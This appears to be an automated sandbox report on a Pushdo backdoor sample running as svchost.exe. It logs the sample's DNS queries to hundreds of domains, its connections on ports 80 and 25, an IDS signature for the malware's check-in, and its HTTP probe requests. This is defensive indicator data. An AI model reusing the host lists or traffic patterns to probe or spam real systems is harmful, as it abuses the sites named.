              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nlcv.bas.bg
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: linac.co.uk
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: uster.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.15.20 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: noblesse.be
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.220 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bossinst.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: redgiga.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 81.0.97.108 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnsds.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: absblast.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: someikan.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: hubbikes.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-mould.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: toundo.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dbnet.at
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ktenergo.ru
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.diamir.de
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.146.206 443
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.wnsavoy.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.129.138.60 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: midap.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: smitko.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: yhsll.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: anteph.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: wahw.com.au
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.89.6.56 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.178.189.131 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ka-mo-me.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kayoaiba.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbmfg.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: orlyhotel.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.160.168 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccssinc.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 27.0.174.59 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.209.32.212 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.251.116 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: pro-fa.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.31.76.90 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: univi.it
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.206.199 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.64.163.50 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.230.155.43 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: grlawcc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ottospm.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.19.116.195 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ex-olive.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: coxkitchensandbaths.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: holp-ai.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shittas.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: missnue.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.137.75.45 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: jsaps.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: haigh-me.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 443
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: canasil.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ldh.la.gov
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.167.255.150 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpmteam.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: awfraser.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messagingengine.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.21.93.239 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.113.204.223 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: araax.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 109.71.54.22 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: adventist.ro
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.129.97 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.36.175.146 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 145.239.5.159 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.railbook.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 78.46.224.133 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ciicsc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: akr.co.id
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shztm.ru
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.55.151 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 210.140.73.39 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbras.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymlp15.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.75 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 72.251.233.245 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: vvsteknik.dk
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.clinicasanluis.com.co
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.0.113.0 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.239.32.21 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: hbfuels.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: atis-sk.ca
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nekono.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 156.251.140.23 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.3 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.findbc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: infotech.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 61.200.81.21 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.97.62 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cqdgroup.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: tabbles.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.164.178 443
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.muhr-soehne.de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.68.7 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.24.39 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: alexpope.biz
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.233.160.146 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.11.56.50 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.34.228.78 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: web-york.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.217 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.221 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: fr-dat.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.172.94.1 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.201.225.123 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: beafin.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: stopllc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: arowines.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: rast.se
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.c9dd.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: fifa-ews.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.vitaindu.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: aba.org.eg
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.167.60 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: wanoa.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shiner.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.87 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.234.121 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.8.75 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.187.206.66 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.reglera.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: msl-lock.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: scip.org.uk
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.usadig.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.214.171.193 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.169.149.78 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: epc.com.au
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.95.235 443
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: okashimo.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: slower.it
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.55.51 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: workplus.hu
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: jnf.at
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mjrcpas.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjcagent.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 81.169.145.175 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: iranytu.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.142.176.225 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccrsi.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: snf.it
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: anduran.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: sinwal.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kursavto.ru
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: wolffkran.de
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.4.16.43 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: wnit.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ntc.edu.au
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: captlfix.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: popbook.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: acraloc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: eos-i.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: uhsa.edu.ag
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: atb-lit.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: skgm.ru
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: pleszew.policja.gov.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: icd-host.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.52.126 443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.56.33.8 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: burstner.ru
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.3.246.178 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.205.242.146 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 86.105.245.69 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: aluminox.es
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.170.222 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ie-roi.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.153.27 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: xult.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.140.52 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shanks.co.uk
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.153.26 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.22.232.175 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.239.201.14 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivastay.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.72.4.226 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: plaske.ua
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: touchfam.ca
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.100.180.31 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: a-domani.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.232.25.17 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettlinx.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: softizer.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: rokoron.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jroy.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbp-jp.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: doggybag.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.rs-ag.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.197.121.220 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.72.176.26 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: htsmx.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.181.161.11 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dwid.de
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.181 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: skypearl.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludea.cz
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.188.2.51 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 38.36.96.76 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: esmoke.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: simetar.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: btsi.com.ph
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: agulatex.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gcss.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 64.18.191.61 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.130.4.196 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.158.251 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: leapc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: magicomm.co.uk
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: xsui.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nolaoig.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.106.129.180 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dyag-eng.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: hchc.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: webband.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: keio-web.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.100.146.220 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: 603888.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ascc.org.au
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: canmore.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: pertex.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shenhgts.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.medisa.info
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.231.13.148 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.mail.yahoo.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: rappich.de
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.163.101 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: insia.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.130.253.23 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.89 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: biurohera.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: agitz.com.br
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: wantapc.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: duiops.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.15.12.103 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.200.51.73 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mcseurope.nl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: orbitgas.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.1.81.28 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: fogra.com.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: polprime.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nrsi.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mondopp.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.39.198.18 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.253.63.27 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: deckoviny.cz
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: roewer.de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettle.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: diamir.de
              Source: TrafficSnort IDS: 2016867 ET TROJAN Backdoor.Win32.Pushdo.s Checkin 192.168.2.3:49712 -> 104.21.23.9:80
              Source: unknownDNS traffic detected: query: paraski.org replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ascc.org.au replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: atis-sk.ca replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: invictus.pl replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: webband.com replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: www.udesign.biz replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: com-edit.fr replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: mail7.digitalwaves.co.nz replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: amba-tc.si replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: canmore.com replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: mondopp.net replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: www.wkhk.net replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: www.jroy.net replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: koz1.net replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: eos-i.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: awfraser.com replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: iranytu.net replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: www.owsports.ca replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: arowines.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: avc.com.sa replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: 89gospel.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: anteph.org replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: www.vazir.se replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: www.koz1.net replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: agitz.com.br replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: chzko.ru replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: polprime.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: www.yumgiskor.kz replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: pcoyuncu.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ktenergo.ru replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: toundo.net replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: cpwpb.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: actmin.com replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: www.medisa.info replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: someikan.com replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: clysma.com replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: slower.it replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: grlawcc.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: htsmx.net replaycode: Server failure (2)
              Source: unknownDNS traffic detected: query: haigh-me.com replaycode: Name error (3)
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.clinicasanluis.com.co
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
              Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
